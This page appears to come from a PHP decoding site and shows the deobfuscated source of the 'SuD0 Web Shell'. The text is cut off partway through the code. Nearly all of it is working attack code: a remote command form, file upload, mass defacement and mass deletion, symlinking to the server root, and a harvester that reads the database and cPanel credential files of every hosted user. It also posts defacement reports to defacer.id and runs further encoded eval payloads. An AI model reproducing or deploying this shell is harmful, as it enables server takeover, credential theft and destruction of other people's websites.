Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto hOAue; qJRhe: echo "\x3c\x6c\x69\x3e\133\x20\74\141\40\150\162\145\x66\x3d\47..
Decoded Output download
<?php
goto hOAue; qJRhe: echo "<li>[ <a href='?dir={$dir}&do=auto_edit_user'>Auto Edit User</a> ]</li>"; goto Tq01b; hy4jF: @clearstatcache(); goto axCEd; TJKkB: @ini_set("display_errors", 0); goto NeUvg; Wmtoe: echo "<center>"; goto J1fnQ; Skaey: if (get_magic_quotes_gpc()) { function idx_ss($array) { return is_array($array) ? array_map("idx_ss", $array) : stripslashes($array); } $_POST = idx_ss($_POST); } goto yKdsw; YWJkV: echo "<tr><td>MySQL: {$mysql} | Perl: {$perl} | Python: {$python} | WGET: {$wget} | CURL: {$curl} </td></tr>"; goto AjGjJ; p3bLB: @ini_set("output_buffering", 0); goto TJKkB; m9Ss5: echo "<li>[ <a href='?dir={$dir}&do=defacerid'>Defacer.ID</a> ]</li>"; goto rhmdN; JJlv1: echo "<li>[ <a href='?dir={$dir}&do=fake_root'>Fake Root</a> ]</li>"; goto qJRhe; FbEMB: echo "<center><hr><form>\xa<select onchange='if (this.value) window.open(this.value);'>\xa <option selected='selected' value=''> Enu_scripts </option>
<option value='{$ling}=lse'>lse script</option>
<option value='{$ling}=private'>Linux Private-i</option>\xa <option value='{$ling}=peass-ng'>peass-ng script</option>\xa <option value='{$ling}=les'>Linux Exploit Suggester</option>
<option value='{$ling}=bashark'>bashark enu script</option>
<option value='{$ling}=LinEnu'>LinEnu script</option>
\xa</select>
<noscript><input type='submit' value='Submit'></noscript>
</form>Copyright © " . date("Y") . " - <a href='https://sudo_family.org/' target='_blank'><font color=lime>SuD0 Family</font></a> </center>"; goto Lule7; bhf0C: echo "<li>[ <a href='?dir={$dir}&do=jumping'>Jumping</a> ]</li>"; goto Dw0eC; zOQmB: echo "</center>"; goto FrCPJ; WEwD7: $curl = function_exists("curl_version") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto pPSA4; X2ZwW: if (isset($_GET["dir"])) { $dir = $_GET["dir"]; chdir($_GET["dir"]); } else { $dir = getcwd(); } goto lFDuc; Y4IOJ: $mysql = function_exists("mysql_connect") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto WEwD7; HMHCF: if ($_GET["do"] == "upload") { echo "<center>"; if ($_POST["upload"]) { if (@copy($_FILES["ix_file"]["tmp_name"], "{$dir}/" . $_FILES["ix_file"]["name"] . '')) { $act = "<font color=lime>Uploaded!</font> at <i><b>{$dir}/" . $_FILES["ix_file"]["name"] . "</b></i>"; } else { $act = "<font color=red>failed to upload file</font>"; } } echo "Upload File: [ " . w($dir, "Writeable") . " ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>"; echo $act; echo "</center>"; } elseif ($_GET["do"] == "cmd") { echo "<form method='post'>
<font style='text-decoration: underline;'>" . $user . "@" . gethostbyname($_SERVER["HTTP_HOST"]) . ":~# </font>\xa\x9<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>\xa\x9</form>"; if ($_POST["do_cmd"]) { echo "<pre>" . exe($_POST["cmd"]) . "</pre>"; } } elseif ($_GET["do"] == "mass_deface") { echo "<center><form action="" method="post">
"; $dirr = $_POST["d_dir"]; $index = $_POST["script"]; $index = str_replace(""", "'", $index); $index = stripslashes($index); function edit_file($file, $index) { if (is_writable($file)) { clear_fill($file, $index); echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>"; } else { echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>"; } } function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "[<font color=lime>DELETED</font>] {$lokasi}<br>"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } function clear_fill($file, $index) { if (file_exists($file)) { $handle = fopen($file, "w"); fwrite($handle, ''); fwrite($handle, $index); fclose($handle); } } function gass() { global $dirr, $index; chdir($dirr); $me = str_replace(dirname(__FILE__) . "/", '', __FILE__); $files = scandir($dirr); $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", "."); sort($files); $n = 0; foreach ($files as $file) { if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) { echo "<center><Span style='color: #8A8A8A;'><strong>{$dirr}/</span>{$file}</strong> ====> "; edit_file($file, $index); flush(); $n = $n + 1; } } echo "<br>"; echo "<center><br><h3>{$n} Kali Anda Telah Ngecrot Disini </h3></center><br>"; } function ListFiles($dirrall) { if ($dh = opendir($dirrall)) { $files = array(); $inner_files = array(); $me = str_replace(dirname(__FILE__) . "/", '', __FILE__); $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db"); while ($file = readdir($dh)) { if ($file != "." && $file != ".." && $file[0] != "." && !in_array($file, $notallow)) { if (is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all() { global $index; $dirrall = $_POST["d_dir"]; foreach (ListFiles($dirrall) as $key => $file) { $file = str_replace("//", "/", $file); echo "<center><strong>{$file}</strong> ===>"; edit_file($file, $index); flush(); } $key = $key + 1; echo "<center><br><h3>{$key} Kali Anda Telah Ngecrot Disini </h3></center><br>"; } function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<font color=lime>DONE</font>] {$lokasi}<br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } if ($_POST["mass"] == "onedir") { echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\xa"; $ini = "http://"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}/{$file}", "w+"); $finish = @fwrite($start, $indx); if ($finish) { echo "{$ini}{$row}/{$file}\xa"; } } echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>
"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}/{$file}", "w+"); $finish = @fwrite($start, $indx); if ($finish) { echo "<a href="http://" . $row . "/" . $file . "" target="_blank">http://" . $row . "/" . $file . "</a><br>"; } } } elseif ($_POST["mass"] == "sabunkabeh") { gass(); } elseif ($_POST["mass"] == "hapusmassal") { hapus_massal($_POST["d_dir"], $_POST["d_file"]); } elseif ($_POST["mass"] == "sabunmematikan") { gass_all(); } elseif ($_POST["mass"] == "massdeface") { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); echo "</div>"; } else { echo "\xa \x9<center><font style='text-decoration: underline;'>
\x9\x9Select Type:<br>
\x9</font>\xa\x9 <select class="select" name="mass" style="width: 450px;" height="10">
<option value="onedir">Mass Deface 1 Dir</option>
\x9\x9<option value="massdeface">Mass Deface ALL Dir</option>
\x9\x9<option value="sabunkabeh">Sabun Massal Di Tempat</option>\xa \x9<option value="sabunmematikan">Sabun Massal Bunuh Diri</option>\xa\x9\x9<option value="hapusmassal">Mass Delete Files</option></center></select><br>\xa\x9 <font style='text-decoration: underline;'>Folder:</font><br>
\x9\x9<input type='text' name='d_dir' value='{$dir}' style='width: 450px;' height='10'><br>\xa \x9<font style='text-decoration: underline;'>Filename:</font><br>\xa\x9\x9<input type='text' name='d_file' value='hacked_by_s.php' style='width: 450px;' height='10'><br>
\x9<font style='text-decoration: underline;'>Index File:</font><br>
\x9\x9<textarea name='script' style='width: 450px; height: 200px;color: red;'>Hacked By SuDo Family</textarea><br>\xa \x9<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
\x9</form></center>"; } } elseif ($_GET["do"] == "zip") { echo "<center><h1>Zip Menu</h1>"; function rmdir_recursive($dir) { foreach (scandir($dir) as $file) { if ("." === $file || ".." === $file) { continue; } if (is_dir("{$dir}/{$file}")) { rmdir_recursive("{$dir}/{$file}"); } else { unlink("{$dir}/{$file}"); } } rmdir($dir); } if ($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array("application/zip", "application/x-zip-compressed", "multipart/x-zip", "application/x-compressed"); foreach ($accepted_types as $mime_type) { if ($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == "zip" ? true : false; if (!$continue) { $message = "Itu Bukan Zip , , GOBLOK COK"; } $path = dirname(__FILE__) . "/"; $filenoext = basename($filename, ".zip"); $filenoext = basename($filenoext, ".ZIP"); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) { rmdir_recursive($targetdir); } mkdir($targetdir, 511); if (move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "<b>Sukses Gan :)</b>"; } else { $message = "<b>Error Gan :(</b>"; } } echo "<table style="width:100%" border="1">
<tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
<label>Zip File : <input type="file" name="zip_file" /></label>
<input type="submit" name="submit" value="Upload And Unzip" />
</form>"; if ($message) { echo "<p>{$message}</p>"; } echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='{$dir}' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='{$dir}/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>"; if ($_POST["backup"]) { $save = $_POST["save"]; function Zip($source, $destination) { if (extension_loaded("zip") === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . "/", '', $file . "/")); } else { if (is_file($file) === true) { $zip->addFromString(str_replace($source . "/", '', $file), file_get_contents($file)); } } } } else { if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } } return $zip->close(); } } return false; } Zip($_POST["dir"], $save); echo "Done , Save To <b>{$save}</b>"; } echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='{$dir}/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='{$dir}/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>"; if ($_POST["extrak"]) { $save = $_POST["save"]; $zip = new ZipArchive(); $res = $zip->open($_POST["dir"]); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo "Succes , Location : <b>" . $save . "</b>"; } else { echo "Gagal Mas :( Ntahlah !"; } } echo "</tr></table>"; } elseif ($_GET["do"] == "shellchk") { eval(str_rot13(gzinflate(str_rot13(base64_decode("vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU="))))); } elseif ($_GET["do"] == "loghunter") { eval(str_rot13(gzinflate(str_rot13(base64_decode("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))); } elseif ($_GET["do"] == "metu") { echo "<form action="?dir=$dir&do=metu" method="post">"; unset($_SESSION[md5($_SERVER["HTTP_HOST"])]); echo "Byee !"; } elseif ($_GET["do"] == "about") { echo "<center>SuD0 Web Shell<hr>Just Shell By KILLER_007 -> Member of Sudo Family "; } elseif ($_GET["do"] == "symlink") { $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $dir); $d0mains = @file("/etc/named.conf"); if ($d0mains) { @mkdir("cox_sym", 511); @chdir("cox_sym"); @exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks\xaDirectoryIndex jancox.htm
AddType text/plain .php \xaAddHandler text/plain .php
Satisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<tr>\xa<td align=center><font size=2>S. No.</font></td>\xa<td align=center><font size=2>Domains</font></td>\xa<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("zone", $d0main)) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0])); echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>\xa<td align=left><a href=http://www." . $domains[1][0] . "/><font class=txt>" . $domains[1][0] . "</font></a></td>
<td>" . $user["name"] . "</td>\xa<td><a href='{$full}/cox_sym/root/home/" . $user["name"] . "/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush(); $dcount++; } } } echo "</table>"; } else { $TEST = @file("/etc/passwd"); if ($TEST) { @mkdir("cox_sym", 511); @chdir("cox_sym"); exe("ln -s / root"); $file3 = "Options Indexes FollowSymLinks
DirectoryIndex jancox.htm\xaAddType text/plain .php \xaAddHandler text/plain .php
Satisfy Any"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa <table align=center border=1><tr>\xa <td align=center><font size=3>S. No.</font></td>\xa <td align=center><font size=3>Users</font></td>\xa <td align=center><font size=3>Symlink</font></td></tr>"; $dcount = 1; $file = fopen("/etc/passwd", "r") or die("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("/\/(.*?)\:\//s", $s, $matches); $matches = str_replace("home/", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo "<tr><td align=center><font size=2>" . $dcount . "</td>\xa <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href={$full}/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++; } fclose($file); echo "</table>"; } else { if ($os != "Windows") { @mkdir("cox_sym", 511); @chdir("cox_sym"); @exe("ln -s / root"); $file3 = "
Options Indexes FollowSymLinks
DirectoryIndex jancox.htm
AddType text/plain .php \xaAddHandler text/plain .php\xaSatisfy Any\xa"; $fp3 = fopen(".htaccess", "w"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
<table align=center border=1><tr>\xa <td align=center><font size=3>ID</font></td>\xa <td align=center><font size=3>Users</font></td>\xa <td align=center><font size=3>Symlink</font></td></tr>"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join(":", $uid) . "
"; } } echo "<br/>"; $temp = trim($temp); $file5 = fopen("test.txt", "w"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("test.txt", "r") or die("Unable to open file!"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("/\/(.*?)\:\//s", $s, $matches); $matches = str_replace("home/", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") { continue; } echo "<tr><td align=center><font size=2>" . $dcount . "</td>\xa <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href={$full}/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++; } fclose($file); echo "</table></div></center>"; unlink("test.txt"); } else { echo "<center><font size=3>Cannot create Symlink</font></center>"; } } } } elseif ($_GET["do"] == "defacerid") { echo "<center><form method='post'>\xa <u>Defacer</u>: <br>\xa <input type='text' name='hekel' size='50' value'Sudo Family'><br>
\x9 <u>Team</u>: <br>\xa \x9<input type='text' name='tim' size='50' value='Extreme Crew'><br>
<u>Domains</u>: <br>
<textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
<input type='submit' name='go' value='Submit' style='width: 450px;'>
\x9</form>"; $site = explode("
", $_POST["sites"]); $go = $_POST["go"]; $hekel = $_POST["hekel"]; $tim = $_POST["tim"]; if ($go) { foreach ($site as $sites) { $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post["attacker"] = "{$hekel}"; $data_to_post["team"] = "{$tim}"; $data_to_post["poc"] = "SQL Injection"; $data_to_post["url"] = "{$zh}"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $form_url); curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, "https://defacer.id/notify.html"); $result = curl_exec($curl); echo $result; curl_close($curl); echo "<br>"; } } } elseif ($_GET["do"] == "config") { if ($_POST) { $passwd = $_POST["passwd"]; mkdir("cox_config", 511); $isi_htc = "Options all\xaRequire None
Satisfy Any"; $htc = fopen("cox_config/.htaccess", "w"); fwrite($htc, $isi_htc); preg_match_all("/(.*?):x:/", $passwd, $user_config); foreach ($user_config[1] as $user_cox) { $user_config_dir = "/home/{$user_cox}/public_html/"; if (is_readable($user_config_dir)) { $grab_config = array("/home/{$user_cox}/.my.cnf" => "cpanel", "/home/{$user_cox}/.accesshash" => "WHM-accesshash", "/home/{$user_cox}/public_html/bw-configs/config.ini" => "BosWeb", "/home/{$user_cox}/public_html/config/koneksi.php" => "Lokomedia", "/home/{$user_cox}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/{$user_cox}/public_html/clientarea/configuration.php" => "WHMCS", "/home/{$user_cox}/public_html/whmcs/configuration.php" => "WHMCS", "/home/{$user_cox}/public_html/forum/config.php" => "phpBB", "/home/{$user_cox}/public_html/sites/default/settings.php" => "Drupal", "/home/{$user_cox}/public_html/config/settings.inc.php" => "PrestaShop", "/home/{$user_cox}/public_html/app/etc/local.xml" => "Magento", "/home/{$user_cox}/public_html/admin/config.php" => "OpenCart", "/home/{$user_cox}/public_html/slconfig.php" => "Sitelok", "/home/{$user_cox}/public_html/application/config/database.php" => "Ellislab", "/home/{$user_cox}/public_html/whm/configuration.php" => "WHMCS", "/home/{$user_cox}/public_html/whmc/WHM/configuration.ph" => "WHMC", "/home/{$user_cox}/public_html/central/configuration.php" => "WHM Central", "/home/{$user_cox}/public_html/whm/WHMCS/configuration.php" => "WHMCS", "/home/{$user_cox}/public_html/whm/whmcs/configuration.php" => "WHMCS", "/home/{$user_cox}/public_html/submitticket.php" => "WHMCS", "/home/{$user_cox}/public_html/configuration.php" => "Joomla", "/home/{$user_cox}/public_html/Joomla/configuration.php" => "JoomlaJoomla", "/home/{$user_cox}/public_html/joomla/configuration.php" => "JoomlaJoomla", "/home/{$user_cox}/public_html/JOOMLA/configuration.php" => "JoomlaJoomla", "/home/{$user_cox}/public_html/Home/configuration.php" => "JoomlaHome", "/home/{$user_cox}/public_html/HOME/configuration.php" => "JoomlaHome", "/home/{$user_cox}/public_html/home/configuration.php" => "JoomlaHome", "/home/{$user_cox}/public_html/NEW/configuration.php" => "JoomlaNew", "/home/{$user_cox}/public_html/New/configuration.php" => "JoomlaNew", "/home/{$user_cox}/public_html/new/configuration.php" => "JoomlaNew", "/home/{$user_cox}/public_html/News/configuration.php" => "JoomlaNews", "/home/{$user_cox}/public_html/NEWS/configuration.php" => "JoomlaNews", "/home/{$user_cox}/public_html/news/configuration.php" => "JoomlaNews", "/home/{$user_cox}/public_html/Cms/configuration.php" => "JoomlaCms", "/home/{$user_cox}/public_html/CMS/configuration.php" => "JoomlaCms", "/home/{$user_cox}/public_html/cms/configuration.php" => "JoomlaCms", "/home/{$user_cox}/public_html/Main/configuration.php" => "JoomlaMain", "/home/{$user_cox}/public_html/MAIN/configuration.php" => "JoomlaMain", "/home/{$user_cox}/public_html/main/configuration.php" => "JoomlaMain", "/home/{$user_cox}/public_html/Blog/configuration.php" => "JoomlaBlog", "/home/{$user_cox}/public_html/BLOG/configuration.php" => "JoomlaBlog", "/home/{$user_cox}/public_html/blog/configuration.php" => "JoomlaBlog", "/home/{$user_cox}/public_html/Blogs/configuration.php" => "JoomlaBlogs", "/home/{$user_cox}/public_html/BLOGS/configuration.php" => "JoomlaBlogs", "/home/{$user_cox}/public_html/blogs/configuration.php" => "JoomlaBlogs", "/home/{$user_cox}/public_html/beta/configuration.php" => "JoomlaBeta", "/home/{$user_cox}/public_html/Beta/configuration.php" => "JoomlaBeta", "/home/{$user_cox}/public_html/BETA/configuration.php" => "JoomlaBeta", "/home/{$user_cox}/public_html/PRESS/configuration.php" => "JoomlaPress", "/home/{$user_cox}/public_html/Press/configuration.php" => "JoomlaPress", "/home/{$user_cox}/public_html/press/configuration.php" => "JoomlaPress", "/home/{$user_cox}/public_html/Wp/configuration.php" => "JoomlaWp", "/home/{$user_cox}/public_html/wp/configuration.php" => "JoomlaWp", "/home/{$user_cox}/public_html/WP/configuration.php" => "JoomlaWP", "/home/{$user_cox}/public_html/portal/configuration.php" => "JoomlaPortal", "/home/{$user_cox}/public_html/PORTAL/configuration.php" => "JoomlaPortal", "/home/{$user_cox}/public_html/Portal/configuration.php" => "JoomlaPortal", "/home/{$user_cox}/public_html/wp-config.php" => "WordPress", "/home/{$user_cox}/public_html/wordpress/wp-config.php" => "WordPressWordpress", "/home/{$user_cox}/public_html/Wordpress/wp-config.php" => "WordPressWordpress", "/home/{$user_cox}/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress", "/home/{$user_cox}/public_html/Home/wp-config.php" => "WordPressHome", "/home/{$user_cox}/public_html/HOME/wp-config.php" => "WordPressHome", "/home/{$user_cox}/public_html/home/wp-config.php" => "WordPressHome", "/home/{$user_cox}/public_html/NEW/wp-config.php" => "WordPressNew", "/home/{$user_cox}/public_html/New/wp-config.php" => "WordPressNew", "/home/{$user_cox}/public_html/new/wp-config.php" => "WordPressNew", "/home/{$user_cox}/public_html/News/wp-config.php" => "WordPressNews", "/home/{$user_cox}/public_html/NEWS/wp-config.php" => "WordPressNews", "/home/{$user_cox}/public_html/news/wp-config.php" => "WordPressNews", "/home/{$user_cox}/public_html/Cms/wp-config.php" => "WordPressCms", "/home/{$user_cox}/public_html/CMS/wp-config.php" => "WordPressCms", "/home/{$user_cox}/public_html/cms/wp-config.php" => "WordPressCms", "/home/{$user_cox}/public_html/Main/wp-config.php" => "WordPressMain", "/home/{$user_cox}/public_html/MAIN/wp-config.php" => "WordPressMain", "/home/{$user_cox}/public_html/main/wp-config.php" => "WordPressMain", "/home/{$user_cox}/public_html/Blog/wp-config.php" => "WordPressBlog", "/home/{$user_cox}/public_html/BLOG/wp-config.php" => "WordPressBlog", "/home/{$user_cox}/public_html/blog/wp-config.php" => 